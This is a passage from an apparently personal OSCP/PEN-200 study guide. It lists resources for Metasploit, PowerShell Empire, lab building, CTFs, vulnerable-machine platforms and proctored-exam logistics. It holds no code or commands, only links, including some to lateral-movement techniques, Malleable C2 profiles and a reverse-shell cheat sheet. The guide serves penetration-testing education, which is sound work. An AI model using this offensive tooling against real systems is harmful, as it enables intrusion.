  &lt;li&gt;Lateral Movement for AD: &lt;a href=&quot;https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash&quot;&gt;https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Lateral Movement with CrackMapExec: &lt;a href=&quot;https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/&quot;&gt;https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-19-metasploit-framework&quot;&gt;Section 19: Metasploit Framework&lt;/h1&gt;
&lt;p&gt;The only guide that I used to learn more about Metasploit is Offensive Security’s Metasploit Unleashed course…which is free!
&lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PEN_200/offsec-metasploit-unleashed.png&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Other Resources: 
Metasploit: The Penetration Tester’s Guide (a super awesome book to read): &lt;a href=&quot;https://nostarch.com/metasploit&quot;&gt;https://nostarch.com/metasploit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Metasploit Documentation: &lt;a href=&quot;https://docs.rapid7.com/metasploit/getting-started/&quot;&gt;https://docs.rapid7.com/metasploit/getting-started/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Msfvenom Cheat Sheets:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/&quot;&gt;http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://netsec.ws/?p=331&quot;&gt;https://netsec.ws/?p=331&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom&quot;&gt;https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-20-powershell-empire&quot;&gt;Section 20: PowerShell Empire:&lt;/h1&gt;

&lt;p&gt;PowerShell Empire is a post-exploitation framework that includes a pure-PowerShell Windows agent and is compatible with Python 3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. Recently, the Kali Linux team partnered with BC Security to sponsor PowerShell Empire. This sponsorship provides Kali users with 30-day exclusive early access to Empire and Starkiller before updates are publicly released to the official repository.&lt;/p&gt;

&lt;p&gt;Empire was originally created by harmj0y, sixdub, and enigma0x3. On July 31, 2019, the original project stopped being supported, and the team at BC Security now maintains the most active fork of Empire: &lt;a href=&quot;https://github.com/BC-SECURITY/Empire&quot;&gt;https://github.com/BC-SECURITY/Empire&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The course does a great job explaining how the tool works and how you can use it. Here are some resources that you can look into to get an understanding of how PowerShell Empire works:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Installing PowerShell Empire: &lt;a href=&quot;https://github.com/BC-SECURITY/Empire/wiki/Installation&quot;&gt;https://github.com/BC-SECURITY/Empire/wiki/Installation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Using PowerShell Empire: &lt;a href=&quot;https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/&quot;&gt;https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Starkiller: &lt;a href=&quot;https://github.com/BC-SECURITY/Starkiller&quot;&gt;https://github.com/BC-SECURITY/Starkiller&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Empire CLI: &lt;a href=&quot;https://github.com/BC-SECURITY/Empire-Cli&quot;&gt;https://github.com/BC-SECURITY/Empire-Cli&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Malleable C2 Profiles for Empire: &lt;a href=&quot;https://github.com/BC-SECURITY/Malleable-C2-Profiles&quot;&gt;https://github.com/BC-SECURITY/Malleable-C2-Profiles&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;extra-resources&quot;&gt;Extra Resources&lt;/h1&gt;

&lt;p&gt;This concludes the resources I have used that helped me understand the course syllabus. Now I will share with you some tips and extra resources that I used to prepare for the PEN200 PWK/OSCP.&lt;/p&gt;

&lt;h1 id=&quot;setting-up-your-pentesting-environment&quot;&gt;Setting up your Pentesting Environment:&lt;/h1&gt;
&lt;p&gt;The course recommends using &lt;a href=&quot;https://www.vmware.com/&quot;&gt;VMware products&lt;/a&gt; to run the custom Kali Linux image that they have created. Windows users can purchase &lt;a href=&quot;https://www.vmware.com/products/workstation-pro.html&quot;&gt;VMware Workstation&lt;/a&gt; or use the free &lt;a href=&quot;https://www.vmware.com/products/workstation-player.html&quot;&gt;VMware Player&lt;/a&gt;. Mac users will need to use &lt;a href=&quot;https://www.vmware.com/products/fusion.html&quot;&gt;VMware Fusion&lt;/a&gt;. 
If you would like to download the custom Kali Linux system for the PWK, you can find it here:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/&quot;&gt;https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Keep in mind that the virtual machines hosted on Offensive Security are updated by the Kali Linux Team. The new PWK does not require you to use a custom Kali system they have made. You can use the latest version that the Kali Linux team maintains to complete the labs/course exercises.&lt;/p&gt;

&lt;p&gt;Another virtual machine I created was a Windows 7 32-bit system to spin up any vulnerable applications I needed to debug or to check whether I could obtain a shell from them. You could also create a Windows 7 64-bit system, but some 32-bit applications may not work as they would on an actual 32-bit system. This practice is great to have in place in case you are stuck on a Windows system running a service that, for some reason, you cannot obtain a shell on.&lt;/p&gt;

&lt;p&gt;For Active Directory preparation I created a Windows Server 2019 and a Windows 10 Pro virtual machine to join to the AD environment I created. There are a few good guides on setting up AD environments in your own lab:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/&quot;&gt;MyExploit2600 AD Lab Creation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.aidanmitchell.uk/orchestrating-the-hacklab-part-1/&quot;&gt;Orchestrating Automated Lab Creation&lt;/a&gt;
    &lt;ul&gt;
      &lt;li&gt;Parts &lt;a href=&quot;https://www.aidanmitchell.uk/orchestrating-the-hacklab-part-2/&quot;&gt;2&lt;/a&gt;, &lt;a href=&quot;https://www.aidanmitchell.uk/orchestrating-the-hacklab-part-3/&quot;&gt;3&lt;/a&gt;, &lt;a href=&quot;https://www.aidanmitchell.uk/orchestrating-the-hacklab-part-4/&quot;&gt;4&lt;/a&gt;, &lt;a href=&quot;https://www.aidanmitchell.uk/orchestrating-the-hacklab-part-5/&quot;&gt;5&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you are interested in expanding your environment and wondering how to do that, I wrote a guide to help you get started on building your own homelab:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.netsecfocus.com/home/lab/2020/09/21/Tjnulls_guide_to_building_a_Home_Lab.html&quot;&gt;https://www.netsecfocus.com/home/lab/2020/09/21/Tjnulls_guide_to_building_a_Home_Lab.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;wargameshands-on-challenges&quot;&gt;Wargames/Hands-on Challenges:&lt;/h1&gt;
&lt;p&gt;I know I stated these before, but I am going to reiterate this:&lt;/p&gt;

&lt;p&gt;OverTheWire Bandit:
A good set of fun Linux challenges to get yourself familiarized with bash and Linux. Abatchy’s walkthrough really helped me here:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Bandit 1-5: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-0-5&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-0-5&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 6-10: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-6-10&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-6-10&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 11-15: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-11-15&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-11-15&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 16-20: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-16-20&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-16-20&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bandit 21-26: &lt;a href=&quot;https://www.abatchy.com/2016/10/overthewire-bandit-21-24&quot;&gt;https://www.abatchy.com/2016/10/overthewire-bandit-21-24&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;OverTheWire Natas: 
A good set of simple web application challenges. These challenges will help you understand the basics you need to identify issues in web applications. 
Check out this walkthrough here: &lt;a href=&quot;https://infamoussyn.wordpress.com/2014/02/05/overthewire-natas-level-0-16-writeup-updated/&quot;&gt;https://infamoussyn.wordpress.com/2014/02/05/overthewire-natas-level-0-16-writeup-updated/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;UndertheWire: 
Probably my favorite place for challenges because they contain a huge set of PowerShell challenges. 
You can find their challenges here: &lt;a href=&quot;http://www.underthewire.tech/wargames.htm&quot;&gt;http://www.underthewire.tech/wargames.htm&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.root-me.org/&quot;&gt;Root-me.org&lt;/a&gt;: A huge site with challenges for almost everything in cybersecurity. For instance, you will see challenges in the following areas:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Network Forensics (Packet Analysis, Captured Traffic, Network Services)&lt;/li&gt;
  &lt;li&gt;Programming (C, PHP, Java, Shell-coding)&lt;/li&gt;
  &lt;li&gt;Reverse Engineering (disassemble applications)&lt;/li&gt;
  &lt;li&gt;Web Applications and Client Challenges.&lt;/li&gt;
  &lt;li&gt;Forensic Challenges.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Spend a few minutes going through some of these!&lt;/p&gt;

&lt;p&gt;SANS Holiday Hack Challenges: 
&lt;a href=&quot;https://www.holidayhackchallenge.com/past-challenges/&quot;&gt;https://www.holidayhackchallenge.com/past-challenges/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;capture-the-flag-competitions-ctfscyber-competitions&quot;&gt;Capture the Flag Competitions (CTFs)/Cyber Competitions:&lt;/h1&gt;
&lt;p&gt;I know some of you reading this are probably skeptical about why I added this…well, to be honest, the cybersecurity careers that we are in are not a normal 7am-3pm job…it is a lifestyle. I understand that for many of us it is hard to set aside time to do all of the things in this field, and that is totally OK! If you have the time, or if you already can, set some time out of your busy schedule to do a CTF. Go ahead and hack all of the things that many of these CTFs provide as challenges. Trust me, you will learn some cool things in a CTF that not even a class may be able to teach you. Personally, competing in CTFs did help me in this course, and it also gave me a better understanding of what things I should be looking for instead of jumping into rabbit holes!&lt;/p&gt;

&lt;p&gt;Also, do not be scared to compete in a CTF if it is your first time! Everyone has to start somewhere in their journey; you just have to keep pushing forward. So, go out there and find some CTFs, whether they are local to you or online, make some time, and have confidence in doing them.&lt;/p&gt;

&lt;p&gt;If you cannot find any local CTFs, check out &lt;a href=&quot;https://www.CTFTime.org&quot;&gt;CTFTime&lt;/a&gt; for online competitions that you can participate in. 
A lot of the cyber competitions in the past few years really helped me build my skills, and I still go out once in a while to find a CTF to compete in for fun 😊. You may also find CTFs that Offsec sponsors where you can win a PWK voucher!&lt;/p&gt;

&lt;h1 id=&quot;vulnerable-machines&quot;&gt;Vulnerable Machines:&lt;/h1&gt;
&lt;p&gt;Boot-to-Root vulnerable machines! These machines are excellent for building your pentesting skills. There are sites where you can download them and run them on your own system to begin practicing, and others where you can connect to their range and start hacking the targets they host. Most of them end with obtaining root or Administrator/SYSTEM-level access. Personally, my three favorite places are Proving Grounds, HackTheBox, and Vulnhub.&lt;/p&gt;

&lt;p&gt;Keep in mind that the boxes that you assess on these platforms should be used as a way to get started, to build your practical skills, or brush up on any weak points that you may have in your pentesting methodology.&lt;/p&gt;

&lt;p&gt;When you are comfortable enough to take the course, it is encouraged that you try to go through every system in the PWK/OSCP lab environment, as they will provide better insight for when you attempt the exam itself.&lt;/p&gt;

&lt;h3 id=&quot;proving-grounds&quot;&gt;&lt;a href=&quot;https://www.offensive-security.com/labs/individual/&quot;&gt;Proving Grounds&lt;/a&gt;:&lt;/h3&gt;

&lt;p&gt;Offensive Security has released their own private lab environment where you can practice your pentesting skills on the boxes they provide online. The platform offers two tiers: PG Play and PG Practice. PG Play brings boxes from Vulnhub to life and provides dedicated access either by connecting to their environment through a VPN or by using the browser-based Kali Linux system. Keep in mind that PG Play only allows you three hours per day to assess a system in the Play environment. They only provide Linux boxes as well, but this could change in the future.&lt;/p&gt;

&lt;p&gt;PG Practice includes all of the features of PG Play and removes the three-hour time limit. Practice also offers Linux and Windows boxes, created by Offsec experts, that you can use to improve your pentesting skills. Some of the systems, you may notice, were old Offsec exam machines that you can assess to sharpen your hacking skills.&lt;/p&gt;

&lt;p&gt;With approval from Offsec, I have created a list of boxes that I have gone through that I believe were OSCP-like. You can find the list here and check for updates that I will add to it in the future:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PEN_200/proving-grounds.PNG&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;hackthebox&quot;&gt;&lt;a href=&quot;https://www.hackthebox.eu/&quot;&gt;HackTheBox&lt;/a&gt;:&lt;/h3&gt;
&lt;p&gt;An online penetration testing platform that contains a variety of machines to help you improve your penetration testing skills. For those who have not gone through the registration, you will need to pass a challenge to generate an activation code for yourself. Once you have generated your activation code, you will have the ability to access their range. In the free tier you are allowed to play with the 20 active machines they have; every week they cycle a new system into the range and retire an old one. 
If you want access to their retired machines, you will have to get VIP access. It is very affordable in my opinion, and worth investing in. If you do not have the funds to invest in HackTheBox, do not worry, because you can certainly find walkthroughs online (once the boxes are retired). One place I would definitely recommend looking at is IppSec’s HackTheBox walkthroughs on YouTube! I love watching his videos because he goes step by step through how to obtain access to the target and how to escalate your privileges to obtain root access. Each box has a different scenario, and IppSec always has something extra to throw in when he is doing his walkthroughs.&lt;/p&gt;

&lt;p&gt;With that being said, I created a list of all of the boxes I did on HackTheBox that I thought were OSCP-like. You can find them here, and also check out the playlist IppSec created from the list I recommended to start watching!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PEN_200/hackthebox.JPG&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I will continue updating this list in the future, and if you would like to keep it around, you can find it here and on NetSecFocus: &lt;a href=&quot;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159&quot;&gt;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;HTB Boxes to Prepare for OSCP (Youtube Playlist): &lt;a href=&quot;https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&quot;&gt;https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ippsec Rocks: &lt;a href=&quot;https://ippsec.rocks/?#&quot;&gt;https://ippsec.rocks/?#&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;vulnhub&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/&quot;&gt;Vulnhub&lt;/a&gt;:&lt;/h3&gt;
&lt;p&gt;Just like HackTheBox, except you have to download the vulnerable machines and run them on your local system. You will need VMware or VirtualBox (I recommend VMware Workstation) to run these vulnerable systems. Please make sure that you are running these vulnerable systems on an isolated network and not on a public network.&lt;br /&gt;
Thanks to g0tmi1k and his team for hosting this site and to the creators who submit these vulnerable machines. I have also created a list of Vulnhub machines that I have found to be OSCP-like as well. You can find them here and on NetSecFocus:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PEN_200/vulnhub.JPG&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I will continue to update this list and if you would like a copy for review you can certainly find it here: 
&lt;a href=&quot;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0&quot;&gt;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Rooting vulnerable machines is extremely important when you are preparing for PWK/OSCP because you can’t depend on theoretical knowledge to pass. Improving your hands-on skills will play a key role when you are tackling these machines.&lt;/p&gt;

&lt;h1 id=&quot;tips-to-participate-in-the-proctored-oscp-exam&quot;&gt;Tips to participate in the Proctored OSCP exam:&lt;/h1&gt;

&lt;p&gt;As of August 15th, 2018, all OSCP exams are proctored. This means that a student will be monitored by an Offensive Security staff member through a screen sharing and webcam service. If you would like to learn more about this proctoring process, you can find it here: &lt;a href=&quot;https://www.offensive-security.com/offsec/proctoring/&quot;&gt;https://www.offensive-security.com/offsec/proctoring/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before I took my exam, I had to go through a variety of things to make sure I was prepared for my first attempt. Even with my preparation, I lost 30 minutes of my actual exam time troubleshooting the proctoring applications on my end. With that being said, here are my tips to help you prepare for the proctoring section when you are ready to take the exam:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Make sure your system is able to meet the software/hardware requirements that Offensive Security provides in order to run these services. You can find that information here: &lt;a href=&quot;https://support.offensive-security.com/proctoring-faq/&quot;&gt;https://support.offensive-security.com/proctoring-faq/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Test your webcam to make sure it works. You cannot use a spare laptop that has a webcam and connect the webcam session on that system.&lt;/li&gt;
  &lt;li&gt;The Screen Sharing application needs to be running on your main system that you will be using to connect to your exam.&lt;/li&gt;
  &lt;li&gt;You can use multiple monitors for the exam. Keep in mind that the proctor must be able to see them and that they are connected to your system. The proctor will notify you about how many screens they see, and you will need to confirm the number of monitors you are using. If you use a system that has a monitor that is not connected to the ScreenConnect application, then you will not be able to use that monitor for the exam.&lt;/li&gt;
  &lt;li&gt;Be prepared and log into your webcam and ScreenConnect sessions 30 minutes before your exam.&lt;/li&gt;
  &lt;li&gt;Proctors cannot provide any assistance during the exam.&lt;/li&gt;
  &lt;li&gt;You can take breaks, a nap, or grab a cup of coffee during your exam. Just make sure you notify the proctor when you leave and when you return for your exam.&lt;/li&gt;
  &lt;li&gt;Students are not allowed to record their screens while interacting with any of the exam machines.&lt;/li&gt;
  &lt;li&gt;Also, be dressed for your exam. I think it is pretty simple to understand why.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For any other questions you may have you can check out Offensive Security FAQ for Proctored Exams here: &lt;a href=&quot;https://www.offensive-security.com/faq/&quot;&gt;https://www.offensive-security.com/faq/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;other-resources&quot;&gt;Other Resources:&lt;/h1&gt;
&lt;p&gt;NetSecFocus Learning Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://docs.google.com/spreadsheets/d/12bT8APhWsL-P8mBtWCYu4MLftwG1cPmIL25AEBtXDno/edit#gid=937533738&quot;&gt;https://docs.google.com/spreadsheets/d/12bT8APhWsL-P8mBtWCYu4MLftwG1cPmIL25AEBtXDno/edit#gid=937533738&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Offsec Introduction Guide to the OSCP: &lt;a href=&quot;https://help.offensive-security.com/hc/en-us/articles/360059535932&quot;&gt;https://help.offensive-security.com/hc/en-us/articles/360059535932&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;PWK Learning Path: A very useful resource to help you get started on which boxes you should go through in the PWK lab. Some of the boxes they list also come with hints:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://help.offensive-security.com/hc/en-us/articles/360050473812&quot;&gt;https://help.offensive-security.com/hc/en-us/articles/360050473812&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;books&quot;&gt;Books:&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;Kali Linux Revealed: &lt;a href=&quot;https://www.kali.org/download-kali-linux-revealed-book/&quot;&gt;https://www.kali.org/download-kali-linux-revealed-book/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Attacking Network Protocols: &lt;a href=&quot;https://nostarch.com/networkprotocols&quot;&gt;https://nostarch.com/networkprotocols&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Red Team Field Manual: &lt;a href=&quot;https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504&quot;&gt;https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Hash-Crack-Password-Cracking-Manual v3: &lt;a href=&quot;https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618&quot;&gt;https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Operator Handbook: Red Team + OSINT + Blue Team Reference: &lt;a href=&quot;https://www.amazon.com/dp/B085RR67H5&quot;&gt;https://www.amazon.com/dp/B085RR67H5&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;The Hacker Playbook Series: &lt;a href=&quot;https://securepla.net/hacker-playbook/&quot;&gt;https://securepla.net/hacker-playbook/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;The Web Application Hacker Handbook: &lt;a href=&quot;http://mdsec.net/wahh/&quot;&gt;http://mdsec.net/wahh/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Learn Windows PowerShell in a Month of Lunches 3rd Edition &lt;a href=&quot;https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160&quot;&gt;https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Violent Python: &lt;a href=&quot;https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579&quot;&gt;https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Black Hat Python: &lt;a href=&quot;https://nostarch.com/blackhatpython&quot;&gt;https://nostarch.com/blackhatpython&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;courses-that-can-help-you-prepare-for-oscp&quot;&gt;Courses that can help you prepare for OSCP:&lt;/h4&gt;

&lt;p&gt;eLearnSecurity/INE:&lt;/p&gt;

&lt;p&gt;eLearnSecurity used to be a great place to learn more about pentesting with the courses they offered. Now that they are owned by INE, you have to buy training from INE’s subscription-based platform to learn from the material they offer and to obtain the certifications eLearnSecurity offers.&lt;/p&gt;

&lt;p&gt;INE Cybersecurity Training: &lt;a href=&quot;https://ine.com/pages/cybersecurity&quot;&gt;https://ine.com/pages/cybersecurity&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;eLearnSecurity Certs:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;eJPT: &lt;a href=&quot;https://elearnsecurity.com/product/ejpt-certification/&quot;&gt;https://elearnsecurity.com/product/ejpt-certification/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;eCPPTv2: &lt;a href=&quot;https://elearnsecurity.com/product/ecpptv2-certification/&quot;&gt;https://elearnsecurity.com/product/ecpptv2-certification/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;TryHackMe:&lt;/p&gt;

&lt;p&gt;A platform to help people grow their skills and learn more about cybersecurity. They have a variety of different rooms you can choose from, and they do a good job explaining fundamental concepts in some of these rooms. They also have learning paths that you can complete, but you may have to pay for them or purchase a subscription to access them.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/&quot;&gt;https://tryhackme.com/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SANS:&lt;/p&gt;

&lt;p&gt;SANS provides a wide variety of information security courses. Each of their courses is taught by very smart instructors who have been in this field for a very long time. However, these courses can be expensive if you are unable to get someone to pay for them. You can also apply for the SANS workforce training to be able to take their courses at a discount. I have taken most of the SANS courses, and I feel that the following courses really helped me get a better understanding of what pentesting is like in the actual field. Here are the courses that I would recommend if you are looking to prepare for OSCP.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;SANS 560: &lt;a href=&quot;https://www.sans.org/course/network-penetration-testing-ethical-hacking&quot;&gt;https://www.sans.org/course/network-penetration-testing-ethical-hacking&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SANS 542: &lt;a href=&quot;https://www.sans.org/course/web-app-penetration-testing-ethical-hacking&quot;&gt;https://www.sans.org/course/web-app-penetration-testing-ethical-hacking&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;PentesterLab: 
A lot of web app pentesting material on this platform: 
&lt;a href=&quot;https://pentesterlab.com/&quot;&gt;https://pentesterlab.com/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pentester Academy: 
&lt;a href=&quot;https://www.pentesteracademy.com/topics&quot;&gt;https://www.pentesteracademy.com/topics&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Web Security Academy:
&lt;a href=&quot;https://portswigger.net/web-security&quot;&gt;https://portswigger.net/web-security&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;other-oscp-guides&quot;&gt;Other OSCP guides:&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html&quot;&gt;https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://411hall.github.io/OSCP-Preparation&quot;&gt;https://411hall.github.io/OSCP-Preparation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.gitbook.com/book/sushant747/total-oscp-guide&quot;&gt;https://www.gitbook.com/book/sushant747/total-oscp-guide&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://0xc0ffee.io/blog/OSCP-Goldmine&quot;&gt;http://0xc0ffee.io/blog/OSCP-Goldmine&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://h4ck.co/oscp-journey-exam-lab-prep-tips/&quot;&gt;https://h4ck.co/oscp-journey-exam-lab-prep-tips/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/&quot;&gt;https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/&quot;&gt;http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://ranakhalil101.medium.com/my-oscp-journey-a-review-fa779b4339d9&quot;&gt;https://ranakhalil101.medium.com/my-oscp-journey-a-review-fa779b4339d9&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/&quot;&gt;https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Links:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://practicalpentestlabs.com/&quot;&gt;https://practicalpentestlabs.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://immersivelabs.co.uk/&quot;&gt;https://immersivelabs.co.uk/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet&quot;&gt;http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;conclusion&quot;&gt;Conclusion:&lt;/h1&gt;
